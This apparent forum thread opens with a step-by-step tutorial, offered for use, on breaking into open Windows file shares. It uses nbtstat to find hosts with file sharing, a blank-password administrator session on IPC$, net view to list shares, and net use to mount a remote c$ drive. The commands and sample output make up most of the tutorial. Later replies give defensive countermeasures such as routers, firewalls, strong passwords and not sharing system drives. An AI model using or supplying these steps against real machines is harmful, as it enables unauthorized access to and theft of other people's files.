Searching for open Windows Shares with NetBIOS

[ssym3tryy]

Searching for open Windows Shares with NetBIOS - a tutorial by sym3try

This is an older exploit, but it still works on many computers.

STEP 1

From the command prompt, type this command:

c:\>nbtstat -A <ip_address>

You will get one of two possible responses:

1. Host Not Found. This means that either the host is down or is blocking your requests. You will have to try another host ip address.

2. You will get an output that resembles this:

C:\>nbtstat -A 192.168.2.10

Wireless Network Connection:
Node IpAddress: [192.168.2.10] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-0D-0B-BD-4C-94

***What you are looking for in this output is for one of the NetBIOS entries to contain a Type of "<20>" which indicates that File Sharing is enabled.***

STEP 2

Initiate a NULL Session with the host.

C:\>net use \\<ip_address>\IPC$ "" /user:administrator

This command attempts to connect to the remote Windows share using the default username of "administrator" with a blank password.

This command will either return a reply of "The Command Completed Successfully" or it will return an error, which would indicate that a unique password is set. (cracking these types of passwords is beyond the scope of this specific tutorial, but hey, feel free to write one and post it :D )

STEP 3

Obtain a list of the host's network shares.

C:\>net view \\<ip_address>

This will list all available network shares.

STEP 4

Connect to the share.

C:\>net use * \\<ip_address>\<share_name>$

Example: net use *\\192.168.2.10\c$

Once this operation completes, open up "My Computer" and the network share should now be available, listed as one of your drives.

Enjoy!

SYM3TRY

Hack the Planet

[w31n3r]

and if you do get hacked by some script kiddies, pack up your PC and take up gardening...it'll go a long way in improving your carbon footprint too.

the following is only for the noobs out there:

Counter-measures

1. get and use a decent NAT router. end of story.
2. if you don't use a router with a hardware firewall, make sure windows is fully updated and you have a software firewall at least.
3. use a password, possibly at least 8 characters long with a combination of alpha-numeric and special characters.
4. USE YOUR COMMON SENSE!
5. don't share your folders. if you must, don't share your c: drive or whatever drive your windows system files are on. refer to #4 above.
6. if you need to share folders across a LAN, setup your router firewall to deny all remote server message blocks(SMB) requests. avoid using windows default simple file sharing. google on how to configure and set user permissions.

[Boomer The Dog]

I think that smymm3try is looking for shares-resources on the local network, but this would apply to other computers on the wan (internet) too. His example is if you popped on the local router or wi-fi access point and you wanted to see what was on there, though your local cafe will probably have client separation on, so that neighboring computers can't communicate with each other.

I notice that some Macs don't seem to use netbios names, nothing will come up with nbstat, even when you know the Mac is on the network, unless I'm doing something wrong. Local shares should also show up in My Network Places where you can view network computers.

W3in3r, agreed, when I help people get their net going, I always push them to get a router with a firewall on it the first thing. Most people want wireless so they're going to get a router anyway, but no matter what I try to make sure they use a router.

If you have Verizon DSL, the modem they give you has a router in it, but the firewall is off by default. They have low-medium-high settings on the firewall that you can turn on, so you don't have to get another router with that isp.

One thing I'm not big on is DDOS (denial of service) protection in some of the new firewalls, if you're running torrents, because it can block some of the connections. I haven't seriously experimented with it, but I've seen logs of repeated blocked connections on the port that the torrent client is using.